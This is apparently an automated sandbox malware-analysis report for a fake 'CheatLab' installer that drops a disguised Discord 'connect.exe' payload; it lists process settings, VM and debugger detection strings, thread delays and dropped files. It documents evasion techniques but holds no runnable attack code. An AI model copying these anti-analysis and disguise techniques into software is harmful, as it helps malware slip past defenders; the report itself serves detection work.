          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 6776 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 1988 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe TID: 7404Thread sleep count: 188 > 30Jump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe TID: 7404Thread sleep time: -188000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeLast function: Thread delayed
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_21-13368
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI92A9.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7BB0.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5D78.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5E18.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5ED6.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5D99.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5DA9.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7B80.tmpJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6776Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1988Jump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-33749
          Source: C:\Windows\Installer\MSI7D5A.tmpAPI coverage: 5.9 %
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeAPI coverage: 9.9 %
          Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A7AF79 FindFirstFileExW,6_2_00A7AF79
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: Amcache.hve.25.drBinary or memory string: VMware
          Source: Amcache.hve.25.drBinary or memory string: VMware Virtual USB Mouse
          Source: MSI5E96.tmp.0.drBinary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
          Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.25.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.25.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.25.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.25.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.25.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.25.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.25.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.25.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.25.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.25.drBinary or memory string: vmci.sys
          Source: Amcache.hve.25.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: MSI7D5A.tmp, 00000006.00000002.2085305629.0000000001349000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.25.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.25.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.25.drBinary or memory string: VMware20,1
          Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.25.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.25.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.25.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.25.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.25.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.25.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.25.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.25.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.25.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A4D0A5 IsDebuggerPresent,OutputDebugStringW,6_2_00A4D0A5
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041C000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,21_2_0041C000
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A42310 GetProcessHeap,6_2_00A42310
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A72DCC mov ecx, dword ptr fs:[00000030h]6_2_00A72DCC
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A7AD78 mov eax, dword ptr fs:[00000030h]6_2_00A7AD78
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041C000 mov edx, dword ptr fs:[00000030h]21_2_0041C000
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A633A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00A633A8
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A6353F SetUnhandledExceptionFilter,6_2_00A6353F
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A62968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00A62968
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A66E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00A66E1B
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0DBB8 SetUnhandledExceptionFilter,17_2_00007FF73AF0DBB8
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF73AF0D9D4
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF0D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF73AF0D0B0
